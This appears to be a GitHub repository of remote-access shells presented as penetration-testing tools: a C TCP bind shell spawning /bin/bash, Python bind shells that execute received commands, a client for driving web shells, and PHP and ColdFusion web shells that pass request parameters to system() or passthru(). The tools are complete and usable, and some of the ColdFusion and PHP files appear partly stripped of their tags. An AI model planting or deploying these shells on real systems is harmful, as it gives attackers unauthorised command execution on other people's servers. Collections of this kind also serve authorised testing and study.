├── README.md ├── bindshell.c ├── cliweb.py ├── coldfusion.cfm ├── coldfusion2.cfm ├── multi.py ├── php-eval.php ├── php-form.php ├── single-commands.py └── webshell.php /README.md: -------------------------------------------------------------------------------- 1 | [![Say Thanks](https://img.shields.io/badge/Say%20Thanks-!-1EAEDB.svg?style=flat)](https://saythanks.io/to/deadbits) 2 | 3 | # shells 4 | This is a collection of various shells to be used _during penetration testing or during your own testing within a lab environment._ 5 | The code in this repository *is not* meant for malicious use of any kind. It is here for professional and learning purposes only. 6 | -------------------------------------------------------------------------------- /bindshell.c: -------------------------------------------------------------------------------- 1 | /* 2 | * basic TCP bindshell 3 | * 4 | * https://github.com/deadbits/shells 5 | */ 6 | 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | //#include 14 | 15 | #define SHELL "/bin/bash" // shell to spawn when connection is received 16 | 17 | int main(int argc, char *argv[]) 18 | { 19 | char msg[512]; 20 | int srv_sockfd, new_sockfd; 21 | socklen_t new_addrlen; 22 | struct sockaddr_in srv_addr, new_addr; 23 | 24 | if(argc != 2) 25 | { 26 | printf("\nusage: ./tcpbind \n"); 27 | return -1; 28 | } 29 | 30 | if(fork() == 0) 31 | { 32 | if((srv_sockfd = socket(PF_INET, SOCK_STREAM, 0)) < 0) 33 | { 34 | perror("[error] socket() failed!"); 35 | return -1; 36 | } 37 | 38 | srv_addr.sin_family = PF_INET; 39 | srv_addr.sin_port = htons(atoi(argv[1])); 40 | srv_addr.sin_addr.s_addr = htonl(INADDR_ANY); 41 | if(bind(srv_sockfd, (struct sockaddr *)&srv_addr, sizeof(srv_addr)) < 0) 42 | { 43 | perror("[error] bind() failed!"); 44 | return -1; 45 | } 46 | 47 | if(listen(srv_sockfd, 1) < 0) 48 | { 49 | perror("[error] listen() failed!"); 50 | return -1; 51 | } 52 | 53 | for(;;) 54 | { 55 | new_addrlen = sizeof(new_addr); 56 | new_sockfd = accept(srv_sockfd, (struct sockaddr *)&new_addr, &new_addrlen); 57 | if(new_sockfd < 0) 58 | { 59 | perror("[error] accept() failed!"); 60 | return -1; 61 | } 62 | 63 | if(fork() == 0) 64 | { 65 | close(srv_sockfd); 66 | write(new_sockfd, msg, strlen(msg)); 67 | 68 | dup2(new_sockfd, 2); 69 | dup2(new_sockfd, 1); 70 | dup2(new_sockfd, 0); 71 | 72 | execl(SHELL, NULL, NULL); 73 | return 0; 74 | } 75 | else 76 | close(new_sockfd); 77 | } 78 | 79 | } 80 | return 0; 81 | } 82 | 83 | -------------------------------------------------------------------------------- /cliweb.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import os 4 | import sys 5 | import requests 6 | import urllib 7 | 8 | usage = """ 9 | [ CLI Web-Shell - version 1.0 ] 10 | ----------------------------- 11 | 12 | This script provides you with a command line 13 | interface to a standard RCE web shell. You are 14 | given pseudo sh prompt, when commands are entered 15 | an HTTP request is made to the webshell where the 16 | results are returned and displayed back to your 17 | terminal session, simulating a standard bindshell. 18 | 19 | usage: ./webcli.py 20 | example: ./webcli.py http://target.host/shell.php?cmd= 21 | 22 | *note: currently this script only supports shells shown 23 | in the format above: "target.host/script.blah?var=". 24 | if you are using a different format for your shell, simply 25 | edit this script to meet your specifications. it's not hard. 26 | 27 | """ 28 | 29 | def shell(url, param): 30 | while True: 31 | cmd = raw_input("shell >> ") 32 | if cmd == "exit" or cmd == "quit": 33 | print("[*] closing shell ...") 34 | else: 35 | p = { param : cmd } 36 | req = requests.get(url, params=p) 37 | if req.status_code == 200: 38 | try: 39 | data = req.content.split("\n") 40 | for line in data: 41 | print line 42 | except: 43 | print req.content 44 | 45 | if __name__ == '__main__': 46 | try: 47 | target = sys.argv[1] 48 | if "?" in target: 49 | url, param = target.split("?")[0], target.split("?")[1].strip("=") 50 | shell(url, param) 51 | else: 52 | print("[error] target URL does not meet format requirements!") 53 | sys.exit(1) 54 | except IndexError: 55 | print(usage) 56 | -------------------------------------------------------------------------------- /coldfusion.cfm: -------------------------------------------------------------------------------- 1 | 2 | 3 | CF Shell 4 | 8 | 9 | 10 |
11 | 12 | 13 |
14 | 15 | 16 | -------------------------------------------------------------------------------- /coldfusion2.cfm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 |
5 | 6 | 7 | 8 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 |
Command: 9 | value="#form.cmd#"> 10 |
Options: value="#form.opts#">
Timeout:value="#form.timeout#" value="5">
21 | 22 |
23 | 24 | 25 | 26 | 27 | 28 | 
29 | 			#myVar#
30 |
31 | 32 | 33 | 34 | 35 | -------------------------------------------------------------------------------- /multi.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ## 3 | # multi-connection tcp server 4 | # stripped from Intersect Framework 5 | ## 6 | 7 | import os, sys 8 | import socket 9 | import time 10 | from subprocess import Popen,PIPE,STDOUT,call 11 | 12 | def reaper(): 13 | while activePID: 14 | pid,stat = os.waitpid(0, os.WNOHANG) 15 | if not pid: break 16 | activePID.remove(pid) 17 | 18 | def handler(connection): 19 | while True: 20 | cmd = connection.recv(socksize) 21 | proc = Popen(cmd, 22 | shell=True, 23 | stdout=PIPE, 24 | stderr=PIPE, 25 | stdin=PIPE, 26 | ) 27 | stdout, stderr = proc.communicate() 28 | if cmd.startswith('cd'): 29 | try: 30 | destination = cmd[3:].replace('\n','') 31 | if os.path.isdir(destination): 32 | os.chdir(destination) 33 | current = os.getcwd() 34 | connection.send("[*] %s" % current) 35 | else: 36 | connection.send("[!] Directory does not exist") 37 | except IndexError: 38 | pass 39 | elif cmd == (":quit"): 40 | connection.close() 41 | os._exit(0) 42 | sys.exit(0) 43 | elif proc: 44 | connection.send( stdout ) 45 | connection.send("[shell] => ") 46 | 47 | connection.close() 48 | os._exit(0) 49 | 50 | 51 | def accept(): 52 | while 1: 53 | global connection 54 | connection, address = conn.accept() 55 | connection.send("[shell] => ") 56 | reaper() 57 | childPid = os.fork() 58 | if childPid == 0: 59 | handler(connection) 60 | else: 61 | activePID.append(childPid) 62 | 63 | socksize = 4096 64 | activePID = [] 65 | try: 66 | host, port = sys.argv[1], int(sys.argv[2]) 67 | conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 68 | conn.bind((host, port)) 69 | conn.listen(5) 70 | accept() 71 | except: 72 | print("usage: ./multi.py ") 73 | sys.exit(1) 74 | 75 | -------------------------------------------------------------------------------- /php-eval.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | "; 7 | $cmd = ($_REQUEST['cmd']); 8 | system($cmd); 9 | echo ""; 10 | die; 11 | } 12 | 13 | ?> 14 | 15 | -------------------------------------------------------------------------------- /php-form.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 |
6 | 7 | 8 |
9 | 
10 | 
15 |
16 | 17 | 18 | 19 | 20 | -------------------------------------------------------------------------------- /single-commands.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ## 3 | # simple tcp server using 'commands' library 4 | ## 5 | 6 | import os, sys 7 | import socket 8 | import commands 9 | 10 | socksize = 4096 11 | info = { 12 | 'uname': commands.getoutput('uname -ar'), 13 | 'uid': commands.getoutput('id'), 14 | 'user': os.environ['USER'], 15 | 'home': os.environ['HOME'] 16 | } 17 | 18 | def bind(host, port): 19 | server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 20 | try: 21 | server.bind((host, port)) 22 | server.listen(5) 23 | except: 24 | sys.exit(1) 25 | 26 | conn, addr = server.accept() 27 | for k, v in info.iteritems(): 28 | conn.sendall('%s\t%s' % (k, v)) 29 | conn.sendall("\nshell >> ") 30 | while True: 31 | cmd = conn.recv(socksize) 32 | if cmd.strip("\n") == "quit!": 33 | conn.close() 34 | sys.exit() 35 | else: 36 | out = commands.getoutput(cmd.strip("\n")) 37 | conn.sendall(out) 38 | conn.sendall("\nshell >> ") 39 | 40 | conn.close() 41 | sys.exit() 42 | 43 | try: 44 | host, port = sys.argv[1], sys.argv[2] 45 | bind(host, int(port)) 46 | except: 47 | print("usage: ./tcp.py ") 48 | sys.exit(1) 49 | 50 | -------------------------------------------------------------------------------- /webshell.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | PHP web shell 6 | 7 | 8 |

lol owned.



9 |
10 | command: 11 | 12 |
13 | 14 | '. htmlentities($command). '
';
17 |   		passthru("$command");
18 |   		echo '
'; 19 | } 20 | ?> 21 | 22 | 23 | --------------------------------------------------------------------------------